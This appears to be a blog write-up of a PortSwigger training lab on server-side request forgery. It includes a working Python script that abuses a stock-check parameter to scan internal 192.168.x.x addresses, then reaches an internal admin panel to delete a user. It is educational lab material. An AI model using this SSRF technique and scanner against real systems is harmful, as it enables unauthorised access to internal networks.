siunam's Website

My personal website

Home Writeups Research Blog Projects About

Basic SSRF against another back-end system | Dec 24, 2022

Introduction

Welcome to my another writeup! In this Portswigger Labs lab, you'll learn: Basic SSRF against another back-end system! Without further ado, let's dive in.

Background

This lab has a stock check feature which fetches data from an internal system.

To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.

Exploitation

Home page:

In the previous lab, we found that there is a Server-Side Request Forgery(SSRF) vulnerability in the stock check functionality:

When we clicked the Check stock button, it'll send a POST request to /product/stock, with parameter stockApi, and the value is interesting:

URL decoded:

http://192.168.0.1:8080/product/stock/check?productId=1&storeId=1

As you can see, it's fetching data from an internal system.

Note: IPv4 class C private IP address range is from 192.168.0.0 to 192.168.255.255.

Now, what if I change the IP address to 192.168.0.2?

HTTP status 500, Internal Server Error.

Armed with above information, we can scan the entire IPv4 class C private IP address range!

To do so, I'll write a python script:

#!/usr/bin/env python3

import requests
from threading import Thread
from time import sleep

def sendRequest(url, cookie, IP):
    # Exclude IP 192.168.0.1, which is the stock API address
    if IP == '192.168.0.1':
        return

    data = {
        'stockApi': f'http://{IP}:8080/'
    }

    # Send a POST request to /product/stock, and the data is SSRF payload
    postStockStatusCode = requests.post(url, cookies=cookie, data=data).status_code

    # Using \r to clean previous line
    print(f'[*] Trying IP: {IP}', end='\r')

    if postStockStatusCode != 500:
        print(f'[+] Found valid internal IP addres: {IP}')

def main():
    url = 'https://0ac0003804fb904cc09c4fbf00ec00dc.web-security-academy.net/product/stock'
    cookie = {'session': 'SJCJgVBSnjDBYBwoVILv3a5gcV5F2PQ4'}

    # Generate a list of class C IPv4 private IP addresses, from 192.168.0.0 to 192.168.255.255
    listIPAddress = list()

    for thridOctet in range(256):
        for fourthOctet in range(256):
            listIPAddress.append(f'192.168.{thridOctet}.{fourthOctet}')

    # For each private IP address, spawn a new thread to function sendRequest(url, cookie, IP)
    for IP in listIPAddress:
        thread = Thread(target=sendRequest, args=(url, cookie, IP))
        thread.start()

        # You can adjust how fast of each connection, 0.1s is recommended 
        sleep(0.1)


if __name__ == '__main__':
    main()
┌──(root🌸siunam)-[~/ctf/Portswigger-Labs/Server-Side-Request-Forgery]
└─# python3 ssrf_priv_ip.py
[+] Found valid internal IP addres: 192.168.0.176

Now, let's try to go to http://192.168.0.176:8080/ via our SSRF payload:

Not found, do I need to supply /admin for the admin panel?

Nice! Let's delete user carlos:

We did it!

What we've learned:

  1. Basic SSRF against another back-end system